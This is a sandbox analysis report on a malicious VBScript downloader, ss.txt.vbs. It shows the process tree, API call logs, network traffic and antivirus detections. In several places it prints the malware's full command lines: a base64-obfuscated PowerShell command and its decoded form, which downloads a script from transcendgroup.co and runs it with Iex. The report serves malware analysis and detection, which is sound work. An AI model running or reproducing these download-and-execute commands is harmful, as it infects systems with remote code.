Summary | ZeroBOX

ss.txt.vbs

Generic Malware Antivirus PowerShell
Category  Machine        Started                   Completed
FILE      s1_win7_x6401  Aug. 10, 2023, 9:55 a.m.  Aug. 10, 2023, 9:57 a.m.

Size    1.4KB
Type    ASCII text, with very long lines, with CRLF line terminators
MD5     d7e90b3e0face4bb9956ab6cd048a102
SHA256  6652bde562ae81a5706fc1d857be5d3e0b08494f1c37f1e1cf70ecf153517930
CRC32   532985F2
ssdeep  24:9AYARCwHatOfm8MwnmV7RcvdAHLVT3BtwlimO9Yg21uYEBMEN5G8m4odr8t8E81t:eYARCw6timoniVOdOLVT3BtkiB2MMENM
Yara    None matched

  • wscript.exe (PID 2556): "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\ss.txt.vbs
    • powershell.exe (PID 2632): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
      • powershell.exe (PID 2768): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var = [Microsoft.VisualBasic.Interaction]::Callbyname((New-object net.webclient ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://transcendgroup.co/ss.png' ) | Iex ; [byte[]]"

Name               Response        Post-Analysis Lookup
transcendgroup.co  200.225.42.150

IP Address      Status  Action
164.124.101.2   Active  Moloch
200.225.42.150  Active  Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API        Arguments                 Status  Return  Repeated
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameA  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameA  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0

Time & API         Arguments  Status  Return  Repeated
IsDebuggerPresent                     0       0
IsDebuggerPresent                     0       0

Time & API     console_handle  Status  Return  Repeated  buffer
WriteConsoleW  0x0000001b      1       1       0         GAC Version Location
WriteConsoleW  0x00000023      1       1       0         True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0...
WriteConsoleW  0x00000037      1       1       0         Exception calling "CallByName" with "4" argument(s): "The underlying connection
WriteConsoleW  0x00000043      1       1       0         was closed: An unexpected error occurred on a send."
WriteConsoleW  0x0000004f      1       1       0         At line:1 char:126
WriteConsoleW  0x0000005b      1       1       0         + [Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var =
WriteConsoleW  0x00000067      1       1       0         [Microsoft.VisualBasic.Interaction]::Callbyname <<<< ((New-object net.webclien
WriteConsoleW  0x00000073      1       1       0         t ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://tra
WriteConsoleW  0x0000007f      1       1       0         nscendgroup.co/ss.png' ) | Iex ; [byte[]]
WriteConsoleW  0x0000008b      1       1       0         + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
WriteConsoleW  0x00000097      1       1       0         + FullyQualifiedErrorId : DotNetMethodException
WriteConsoleW  0x000000af      1       1       0         Module : CommonLanguageRuntimeLibrary
WriteConsoleW  0x000000b3      1       1       0         Assembly : mscorlib, Version=2.0.0.0, Culture=neutral, Public
WriteConsoleW  0x000000b7      1       1       0         KeyToken=b77a5c561934e089
WriteConsoleW  0x000000bb      1       1       0         TypeHandle : System.RuntimeTypeHandle
WriteConsoleW  0x000000bf      1       1       0         DeclaringMethod :
WriteConsoleW  0x000000c3      1       1       0         BaseType : System.Array
WriteConsoleW  0x000000c7      1       1       0         UnderlyingSystemType : System.Byte[]
WriteConsoleW  0x000000cb      1       1       0         FullName : System.Byte[]
WriteConsoleW  0x000000cf      1       1       0         AssemblyQualifiedName : System.Byte[], mscorlib, Version=2.0.0.0, Culture=
WriteConsoleW  0x000000d3      1       1       0         neutral, PublicKeyToken=b77a5c561934e089
WriteConsoleW  0x000000d7      1       1       0         Namespace : System
WriteConsoleW  0x000000db      1       1       0         GUID : 00000000-0000-0000-0000-000000000000
WriteConsoleW  0x000000df      1       1       0         GenericParameterAttributes :
WriteConsoleW  0x000000e3      1       1       0         IsGenericTypeDefinition : False
WriteConsoleW  0x000000e7      1       1       0         IsGenericParameter : False
WriteConsoleW  0x000000eb      1       1       0         GenericParameterPosition :
WriteConsoleW  0x000000ef      1       1       0         IsGenericType : False
WriteConsoleW  0x000000f3      1       1       0         ContainsGenericParameters : False
WriteConsoleW  0x000000f7      1       1       0         StructLayoutAttribute :
WriteConsoleW  0x000000fb      1       1       0         Name : Byte[]
WriteConsoleW  0x000000ff      1       1       0         MemberType : TypeInfo
WriteConsoleW  0x00000103      1       1       0         DeclaringType :
WriteConsoleW  0x00000107      1       1       0         ReflectedType :
WriteConsoleW  0x0000010b      1       1       0         MetadataToken : 33554432
WriteConsoleW  0x0000010f      1       1       0         TypeInitializer :
WriteConsoleW  0x00000113      1       1       0         IsNested : False
WriteConsoleW  0x00000117      1       1       0         Attributes : AutoLayout, AnsiClass, Class, Public, Sealed, Seri
WriteConsoleW  0x0000011b      1       1       0         alizable
WriteConsoleW  0x0000011f      1       1       0         IsVisible : True
WriteConsoleW  0x00000123      1       1       0         IsNotPublic : False
WriteConsoleW  0x00000127      1       1       0         IsPublic : True
WriteConsoleW  0x0000012b      1       1       0         IsNestedPublic : False
WriteConsoleW  0x0000012f      1       1       0         IsNestedPrivate : False
WriteConsoleW  0x00000133      1       1       0         IsNestedFamily : False
WriteConsoleW  0x00000137      1       1       0         IsNestedAssembly : False
WriteConsoleW  0x0000013b      1       1       0         IsNestedFamANDAssem : False
WriteConsoleW  0x0000013f      1       1       0         IsNestedFamORAssem : False
WriteConsoleW  0x00000143      1       1       0         IsAutoLayout : True
WriteConsoleW  0x00000147      1       1       0         IsLayoutSequential : False

Time & API      buffer             crypto_handle  flags  crypto_export_handle  blob_type  Status  Return  Repeated
CryptExportKey  <INVALID POINTER>  0x00639c40     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a3c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a3c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a3c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a3c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a3c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a3c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00639c00     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00639c00     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00639c00     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00639800     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a1c0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a540     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a480     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x0063a480     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00654ac0     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655880     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655880     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655880     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655780     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655780     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655780     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655780     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655780     0      0x00000000            6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00655780     0      0x00000000            6          1       1       0

Time & API            Arguments  Status  Return  Repeated
GlobalMemoryStatusEx             1       1       0

Time & API               process_identifier  region_size/length  stack_dep_bypass  stack_pivoted  heap_dep_bypass  protection                   base_address  allocation_type     process_handle  Status  Return  Repeated
NtAllocateVirtualMemory  2632                1769472             0                 0              0                64 (PAGE_EXECUTE_READWRITE)  0x02880000    8192 (MEM_RESERVE)  0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x029f0000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtProtectVirtualMemory   2632                4096                0                 0              0                64 (PAGE_EXECUTE_READWRITE)  0x72561000    -                   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026ba000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtProtectVirtualMemory   2632                8192                0                 0              0                64 (PAGE_EXECUTE_READWRITE)  0x72562000    -                   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026b2000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026c2000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x029f1000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                8192                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x029f2000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026ea000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026c3000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026c4000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026fb000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026f7000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026bb000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e2000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026f5000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026c5000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026ec000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x04c50000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026c6000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026fc000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e3000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e4000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e5000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e6000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e7000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e8000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x026e9000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05030000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05031000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05032000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05033000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05034000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05035000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05036000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05037000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05038000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05039000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x0503a000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x0503b000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x0503c000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x0503d000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x0503e000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x0503f000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05040000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05041000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05042000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05043000    4096 (MEM_COMMIT)   0xffffffff      1       0       0
NtAllocateVirtualMemory  2632                4096                0                 0              1                64 (PAGE_EXECUTE_READWRITE)  0x05044000    4096 (MEM_COMMIT)   0xffffffff      1       0       0

file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var = [Microsoft.VisualBasic.Interaction]::Callbyname((New-object net.webclient ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://transcendgroup.co/ss.png' ) | Iex ; [byte[]]"
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
parameters: $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Status: 1  Return: 1  Repeated: 0

Time & API            Arguments             Status  Return  Repeated
GetAdaptersAddresses  flags: 15, family: 0          111     0

Data received 
Data received F
Data sent tpdÔ5™†[6´Q˛ÁyU\[ÊBøùP"#®“»//5 ÀÀÀ À 28/ÿtranscendgroup.co  
Data sent tpdÔ5cZ‘ËN%' Æî÷IéS¼uƒgL<é¹5‘Ì/5 ÀÀÀ À 28/ÿtranscendgroup.co  
Time & API             Arguments                                               Status  Return  Repeated
LookupPrivilegeValueW  system_name: (empty), privilege_name: SeDebugPrivilege  1       1       0
LookupPrivilegeValueW  system_name: (empty), privilege_name: SeDebugPrivilege  1       1       0

Engine            Detection
MicroWorld-eScan  GT:VB.ObfDldr.30.C108691B
FireEye           GT:VB.ObfDldr.30.C108691B
Arcabit           GT:VB.ObfDldr.30.C108691B
Avast             Script:SNH-gen [Drp]
BitDefender       GT:VB.ObfDldr.30.C108691B
NANO-Antivirus    Trojan.Script.Downloader.hrqanu
VIPRE             GT:VB.ObfDldr.30.C108691B
Emsisoft          GT:VB.ObfDldr.30.C108691B (B)
MAX               malware (ai score=83)
GData             GT:VB.ObfDldr.30.C108691B
ALYac             GT:VB.ObfDldr.30.C108691B
AVG               Script:SNH-gen [Drp]

Time & API Arguments Status Return Repeated

send

buffer: tpdÔ5™†[6´Q˛ÁyU\[ÊBøùP"#®“»//5 ÀÀÀ À 28/ÿtranscendgroup.co  
socket: 1488
sent: 121
Status: 1  Return: 121  Repeated: 0

send

buffer: tpdÔ5cZ‘ËN%' Æî÷IéS¼uƒgL<é¹5‘Ì/5 ÀÀÀ À 28/ÿtranscendgroup.co  
socket: 1488
sent: 121
Status: 1  Return: 121  Repeated: 0

parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var = [Microsoft.VisualBasic.Interaction]::Callbyname((New-object net.webclient ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://transcendgroup.co/ss.png' ) | Iex ; [byte[]]"
parent_process wscript.exe martian_process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe